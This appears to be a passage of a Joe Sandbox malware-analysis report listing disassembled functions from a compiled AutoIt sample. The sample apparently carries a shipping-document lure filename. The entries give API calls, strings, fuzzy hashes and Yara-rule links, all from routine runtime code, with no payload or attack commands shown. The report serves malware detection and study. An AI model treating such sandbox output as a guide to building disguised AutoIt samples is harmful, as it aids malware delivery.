Instruction Fuzzy Hash: 56A1D5B1604742AFD714DF64C884FEAB7AAFF44354F008619FA59D6280EB30EE85CB91

Function 006BD8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 006BD8EB
_wcscmp.LIBCMT ref: 006BD8FC
GetWindowTextW.USER32(00000001,?,00000400), ref: 006BD924
CharUpperBuffW.USER32(?,00000000), ref: 006BD941
_wcscmp.LIBCMT ref: 006BD95F
_wcsstr.LIBCMT ref: 006BD970
GetClassNameW.USER32(00000018,?,00000400), ref: 006BD9A8
_wcscmp.LIBCMT ref: 006BD9B8
GetWindowTextW.USER32(00000002,?,00000400), ref: 006BD9DF
GetClassNameW.USER32(00000018,?,00000400), ref: 006BDA28
_wcscmp.LIBCMT ref: 006BDA38
GetClassNameW.USER32(00000010,?,00000400), ref: 006BDA60
GetWindowRect.USER32(00000004,?), ref: 006BDAC9

Strings

ThumbnailClass, xrefs: 006BD9B3, 006BDA33
@, xrefs: 006BD8C6

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: c3ea46380e4dd7b1ae076e20c83f8debe733a11574c4d27ee908b7b63d1b5703
Instruction ID: 7a2e68beee678fcb7d856e8ecf65d0ac8e4965c1922fb16ad2ee0ac20955669a
Opcode Fuzzy Hash: c3ea46380e4dd7b1ae076e20c83f8debe733a11574c4d27ee908b7b63d1b5703
Instruction Fuzzy Hash: F881CFB10083059BDB10EF50C885BEA7BEAEF44314F04856EFD899E192EB34DD85CBA5

Function 006BD6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 006BD753

Strings

REGEXP=, xrefs: 006BD768
[CLASS:, xrefs: 006BD7A3
ACTIVE, xrefs: 006BD72E
[LAST, xrefs: 006BD800
ALL, xrefs: 006BD7E7
[REGEXPTITLE:, xrefs: 006BD77B
CLASSNAME=, xrefs: 006BD790
LAST, xrefs: 006BD718
[ALL, xrefs: 006BD7F9
[ACTIVE, xrefs: 006BD740
[HANDLE:, xrefs: 006BD75F
HANDLE=, xrefs: 006BD74C

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: a266fbcdf7c02011323d4c1bd8905893b512c70392e45881a5493c37f77370f8
Instruction ID: 14482e7ceaa10a8ee6bebca4d8e250bd196fca9e370bd8585ac44fbea887d7e0
Opcode Fuzzy Hash: a266fbcdf7c02011323d4c1bd8905893b512c70392e45881a5493c37f77370f8
Instruction Fuzzy Hash: 3031CFB1644205AAEB54FA20DD43EEDB3A79F20310F30022DF441B50D3FF65AE458729

Function 006BEA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 006BEAB0
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 006BEAC2
SetWindowTextW.USER32(?,?), ref: 006BEAD9
GetDlgItem.USER32(?,000003EA), ref: 006BEAEE
SetWindowTextW.USER32(00000000,?), ref: 006BEAF4
GetDlgItem.USER32(?,000003E9), ref: 006BEB04
SetWindowTextW.USER32(00000000,?), ref: 006BEB0A
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 006BEB2B
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 006BEB45
GetWindowRect.USER32(?,?), ref: 006BEB4E
SetWindowTextW.USER32(?,?), ref: 006BEBB9
GetDesktopWindow.USER32 ref: 006BEBBF
GetWindowRect.USER32(00000000), ref: 006BEBC6
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 006BEC12
GetClientRect.USER32(?,?), ref: 006BEC1F
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 006BEC44
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 006BEC6F

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: ea091ff83faacac66669c6ed3aad7cc95b9c407f16e0414e3043bb4e71e347d1
Instruction ID: c351b9f2d9c2d36e1e464988314f456e921176019bc2b4c244996fcb3d3e2c19
Opcode Fuzzy Hash: ea091ff83faacac66669c6ed3aad7cc95b9c407f16e0414e3043bb4e71e347d1
Instruction Fuzzy Hash: 1A512F71900709EFDB20DFA8CE85BEEBBB5FF04705F004A18E556A26A0DB75A945CB14

Function 006D79B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 006D79C6
LoadCursorW.USER32(00000000,00007F00), ref: 006D79D1
LoadCursorW.USER32(00000000,00007F03), ref: 006D79DC
LoadCursorW.USER32(00000000,00007F8B), ref: 006D79E7
LoadCursorW.USER32(00000000,00007F01), ref: 006D79F2
LoadCursorW.USER32(00000000,00007F81), ref: 006D79FD
LoadCursorW.USER32(00000000,00007F88), ref: 006D7A08
LoadCursorW.USER32(00000000,00007F80), ref: 006D7A13
LoadCursorW.USER32(00000000,00007F86), ref: 006D7A1E
LoadCursorW.USER32(00000000,00007F83), ref: 006D7A29
LoadCursorW.USER32(00000000,00007F85), ref: 006D7A34
LoadCursorW.USER32(00000000,00007F82), ref: 006D7A3F
LoadCursorW.USER32(00000000,00007F84), ref: 006D7A4A
LoadCursorW.USER32(00000000,00007F04), ref: 006D7A55
LoadCursorW.USER32(00000000,00007F02), ref: 006D7A60
LoadCursorW.USER32(00000000,00007F89), ref: 006D7A6B
GetCursorInfo.USER32(?), ref: 006D7A7B

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: fcb813c4a5af198b6beb59b1f968f040faec66c0dd0e589d2e297b6eff5ba8ed
Instruction ID: d65c248752c7bdb0879983bfa6f46791eaf8a57469d36ad8f65008b8c5b3fe04
Opcode Fuzzy Hash: fcb813c4a5af198b6beb59b1f968f040faec66c0dd0e589d2e297b6eff5ba8ed
Instruction Fuzzy Hash: BD315CB0D0831AAADF509FB68C8989FBFE9FF04750F54452BE50DE7280DA78A5018F91

Function 0068C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 0069E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0068C8B7,?,00002000,?,?,00000000,?,0068419E,?,?,?,0071DC00), ref: 0069E984

Part of subcall function 0068660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006853B1,?,?,006861FF,?,00000000,00000001,00000000), ref: 0068662F

__wsplitpath.LIBCMT ref: 0068C93E

Part of subcall function 006A1DFC: __wsplitpath_helper.LIBCMT ref: 006A1E3C

_wcscpy.LIBCMT ref: 0068C953
_wcscat.LIBCMT ref: 0068C968
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0068C978
SetCurrentDirectoryW.KERNEL32(?), ref: 0068CABE

Part of subcall function 0068B337: _wcscpy.LIBCMT ref: 0068B36F

Strings

AU3!, xrefs: 0068C90C
Unterminated string, xrefs: 006F3470
>>>AUTOIT SCRIPT<<<, xrefs: 006F311B
Error opening the file, xrefs: 006F30B4, 006F313D
Bad directive syntax error, xrefs: 006F3429
#include depth exceeded. Make sure there are no recursive includes, xrefs: 006F3098
EA06, xrefs: 006F30C9

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2258743419-1018226102
Opcode ID: 286e9bf70498bbce195c03432d94fd5b758890cde7ad91b9131d36baf25fc56b
Instruction ID: 22d4e85fdf1f3ac91784e19c19b5c5533beb904f85572c329c841b76a4f75b20
Opcode Fuzzy Hash: 286e9bf70498bbce195c03432d94fd5b758890cde7ad91b9131d36baf25fc56b
Instruction Fuzzy Hash: FF12BE715083459FC764EF24C881AAFBBE6BF99314F004A1EF58993352DB30DA49CB66

Function 006ECE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006ECEFB
DestroyWindow.USER32(?,?), ref: 006ECF73
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 006ECFF4
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 006ED016
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006ED025
DestroyWindow.USER32(?), ref: 006ED042
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00680000,00000000), ref: 006ED075
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006ED094
GetDesktopWindow.USER32 ref: 006ED0A9
GetWindowRect.USER32(00000000), ref: 006ED0B0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 006ED0C2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 006ED0DA

Part of subcall function 0069B526: GetWindowLongW.USER32(?,000000EB), ref: 0069B537

Strings

tooltips_class32, xrefs: 006ECFED, 006ED06E
0, xrefs: 006ECF1B

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
String ID: 0$tooltips_class32
API String ID: 3877571568-3619404913
Opcode ID: 022d5b873a2b039a84ad3f3b4ed6db3d8ea08f3d6be0955c87ad924cb75c60ad
Instruction ID: be9bc7a436de0cf85fb017b486c478bdb7fc1b100571ee516252d94d6199d395
Opcode Fuzzy Hash: 022d5b873a2b039a84ad3f3b4ed6db3d8ea08f3d6be0955c87ad924cb75c60ad
Instruction Fuzzy Hash: 7871DEB4140345AFDB20DF28CC84FA637E6EB89704F48861DF985873A1DB34E842CB26

Function 006EF351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0069B34E: GetWindowLongW.USER32(?,000000EB), ref: 0069B35F

DragQueryPoint.SHELL32(?,?), ref: 006EF37A

Part of subcall function 006ED7DE: ClientToScreen.USER32(?,?), ref: 006ED807
Part of subcall function 006ED7DE: GetWindowRect.USER32(?,?), ref: 006ED87D
Part of subcall function 006ED7DE: PtInRect.USER32(?,?,006EED5A), ref: 006ED88D

SendMessageW.USER32(?,000000B0,?,?), ref: 006EF3E3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 006EF3EE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 006EF411
_wcscat.LIBCMT ref: 006EF441
SendMessageW.USER32(?,000000C2,00000001,?), ref: 006EF458
SendMessageW.USER32(?,000000B0,?,?), ref: 006EF471
SendMessageW.USER32(?,000000B1,?,?), ref: 006EF488
SendMessageW.USER32(?,000000B1,?,?), ref: 006EF4AA
DragFinish.SHELL32(?), ref: 006EF4B1
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 006EF59C

Strings

@GUI_DRAGFILE, xrefs: 006EF54B
@GUI_DROPID, xrefs: 006EF4D1
@GUI_DRAGID, xrefs: 006EF510

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: a5535a373102630ee3781338ba1932aa4aaf7689ed13b4fe196047a80c725f60
Instruction ID: 42fd90c32cd3de19b9b15fe299c0455a993017ad4724e9aace934af5f0851a6f
Opcode Fuzzy Hash: a5535a373102630ee3781338ba1932aa4aaf7689ed13b4fe196047a80c725f60
Instruction Fuzzy Hash: 0D6158B1108340AFC711EFA4CC85E9FBBE9AF89710F004A1EF595921A1DB749A49CB66

Function 006CAAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 006CAB3D
VariantCopy.OLEAUT32(?,?), ref: 006CAB46
VariantClear.OLEAUT32(?), ref: 006CAB52
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 006CAC40
__swprintf.LIBCMT ref: 006CAC70
VarR8FromDec.OLEAUT32(?,?), ref: 006CAC9C
VariantInit.OLEAUT32(?), ref: 006CAD4D
SysFreeString.OLEAUT32(00000016), ref: 006CADDF
VariantClear.OLEAUT32(?), ref: 006CAE35
VariantClear.OLEAUT32(?), ref: 006CAE44
VariantInit.OLEAUT32(00000000), ref: 006CAE80

Strings

Default, xrefs: 006CACFD
%4d%02d%02d%02d%02d%02d, xrefs: 006CAC6A

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 0149ec38559d82385de4ea2eefa6b4ead2f8afbb80471836dc8029f73df9b6ea
Instruction ID: 625ad85ac93a63c6d474994514db70a8a542793a07c3db3a6524c47d29c6f769
Opcode Fuzzy Hash: 0149ec38559d82385de4ea2eefa6b4ead2f8afbb80471836dc8029f73df9b6ea
Instruction Fuzzy Hash: A0D1CB71A00219EBCB249FA5D885FBAB7BBFF08704F14815DE405DB281DB74AC41DBA6

Function 006E716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 006E71FC
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006E7247

Strings

GETITEMCOUNT, xrefs: 006E7311
GETTEXT, xrefs: 006E7382
EXPAND, xrefs: 006E72E1
EXISTS, xrefs: 006E72B0
UNCHECK, xrefs: 006E740B
GETSELECTED, xrefs: 006E733F
CHECK, xrefs: 006E7267
GETTOTALCOUNT, xrefs: 006E722A
SELECT, xrefs: 006E73E0
COLLAPSE, xrefs: 006E728D
ISCHECKED, xrefs: 006E73B2

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: e8c21e4bda8eaea4e081e3661c505fe9e2d8b5e83532b85d3a691ddaee4fe11e
Instruction ID: f09b1e9d1f0151e2a79235e0ed6462c75b1cb59b950b3577db763fc94644784f
Opcode Fuzzy Hash: e8c21e4bda8eaea4e081e3661c505fe9e2d8b5e83532b85d3a691ddaee4fe11e
Instruction Fuzzy Hash: 64918C702047419BCB44EF20C851AAEB7A7BF94310F04486CF9966B7A3DB31ED4ADB95

Function 006BCB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,006BCF50), ref: 006BCE90

Strings

REGEXPCLASS, xrefs: 006BCC56
TEXT, xrefs: 006BCDC7
INSTANCE, xrefs: 006BCD9E
CLASSNN, xrefs: 006BCC33
H+s, xrefs: 006BCCE8
L+s, xrefs: 006BCD14
NAME, xrefs: 006BCCC2
T+s, xrefs: 006BCD72
4+s, xrefs: 006BCC96
P+s, xrefs: 006BCD43
CLASS, xrefs: 006BCC10

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ChildEnumWindows
String ID: 4+s$CLASS$CLASSNN$H+s$INSTANCE$L+s$NAME$P+s$REGEXPCLASS$T+s$TEXT
API String ID: 3555792229-2846808774
Opcode ID: 739aee2ed8e7fdd669fdb9d3b9bb4d20c857cece4be1f2c34cbe9fc96d8ef977
Instruction ID: 0b34c9cc4098cfec6a7e1661291189fbc75e54a07e457b54302b8f06248ffc14
Opcode Fuzzy Hash: 739aee2ed8e7fdd669fdb9d3b9bb4d20c857cece4be1f2c34cbe9fc96d8ef977
Instruction Fuzzy Hash: CE91A8B0600506DBDB58EF60C482BEAFB77BF14310F508529D459A7252DF30AA9BDBE4

Function 006EE4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 006EE5AB
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,006EBEAF), ref: 006EE607
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006EE647
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006EE68C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006EE6C3
FreeLibrary.KERNEL32(?,00000004,?,?,?,?,006EBEAF), ref: 006EE6CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 006EE6DF
DestroyIcon.USER32(?,?,?,?,?,006EBEAF), ref: 006EE6EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 006EE70B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 006EE717

Part of subcall function 006A0FA7: __wcsicmp_l.LIBCMT ref: 006A1030

Strings

.dll, xrefs: 006EE564
.icl, xrefs: 006EE521
.exe, xrefs: 006EE541

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 0821e5b848697b45b3eb285dd5da18fd2ce36a4f7ce4d764505169aafbb03864
Instruction ID: 022cb11c05ac47d22925b998396da4422cd5147b205298866059a1c6c3dc0fb9
Opcode Fuzzy Hash: 0821e5b848697b45b3eb285dd5da18fd2ce36a4f7ce4d764505169aafbb03864
Instruction Fuzzy Hash: 3B61FFB1500355FAEB20EF64CC46BFA77A9AB08720F104205F911E61D1EB75AE80CB64

Function 006CD219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 0068936C: __swprintf.LIBCMT ref: 006893AB
Part of subcall function 0068936C: __itow.LIBCMT ref: 006893DF

CharLowerBuffW.USER32(?,?), ref: 006CD292
GetDriveTypeW.KERNEL32 ref: 006CD2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006CD327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006CD35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006CD38C

Strings

set cd door , xrefs: 006CD32D
closed, xrefs: 006CD2A6, 006CD2AF
open, xrefs: 006CD2B9
close, xrefs: 006CD298
open , xrefs: 006CD2EE
close cd wait, xrefs: 006CD377
wait, xrefs: 006CD349
type cdaudio alias cd wait, xrefs: 006CD30A

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: 6139525102032920882a10346884d446b49aeb09132b7e7969affc4bc3d9778e
Instruction ID: e3ac9154ea4c51e9f9592bd9c0b2c6cf6b6358efe4f225b5a03d4fb19781c227
Opcode Fuzzy Hash: 6139525102032920882a10346884d446b49aeb09132b7e7969affc4bc3d9778e
Instruction Fuzzy Hash: AC515C71104305AFC740EF20C88196EB7EAFF98718F00896DF89A67251DB31EE06CB56

Function 006C26BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,006F3973,00000016,0000138C,00000016,?,00000016,0071DDB4,00000000,?), ref: 006C26F1
LoadStringW.USER32(00000000,?,006F3973,00000016), ref: 006C26FA
GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,006F3973,00000016,0000138C,00000016,?,00000016,0071DDB4,00000000,?,00000016), ref: 006C271C
LoadStringW.USER32(00000000,?,006F3973,00000016), ref: 006C271F
__swprintf.LIBCMT ref: 006C276F
__swprintf.LIBCMT ref: 006C2780
_wprintf.LIBCMT ref: 006C2829
MessageBoxW.USER32(00000000,?,?,00011010), ref: 006C2840

Strings

%s (%d) : ==> %s: %s %s, xrefs: 006C2824
Line %d (File "%s"):, xrefs: 006C2769
Line %d:, xrefs: 006C277A
^ ERROR, xrefs: 006C27D5
Error: , xrefs: 006C27F7

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

